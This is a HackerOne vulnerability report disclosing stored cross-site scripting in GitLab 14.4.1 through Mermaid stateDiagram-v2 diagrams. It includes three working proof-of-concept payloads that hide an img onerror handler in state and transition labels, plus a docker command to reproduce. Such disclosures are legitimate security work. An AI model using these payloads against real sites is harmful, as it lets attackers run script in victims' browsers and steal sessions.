Stored XSS via Mermaid (stateDiagram-v2)

HackerOne report #1390805 by solov9ev on 2021-11-03, assigned to @ngeorge1:

Report | Attachments | How To Reproduce

Report

Summary

Hi, Security Team!
I discovered a stored xss vulnerability via Mermaid (stateDiagram-v2).

Steps to reproduce

• Run Gitlab docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest (GitLab Enterprise Edition 14.4.1-ee)
• Insert into any field that supports markdown with using Mermaid the following payload (stateDiagram-v2):

stateDiagram-v2  
    s2 : This is a state description<img/src='1'/onerror=alert()>  

and

stateDiagram-v2  
    s1 --> s2: A<img/src='1'/onerror=alert()>  

There is another option:

stateDiagram-v2  
    state if_state <<choice>>  
    [*] --> IsPositive  
    IsPositive --> if_state  
    if_state --> False: if n < 0<img/src='1'/onerror=alert()>  
    if_state --> True : if n >= 0  

Impact

With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• 1.png
• 2.png

How To Reproduce

Please add reproducibility information to this section: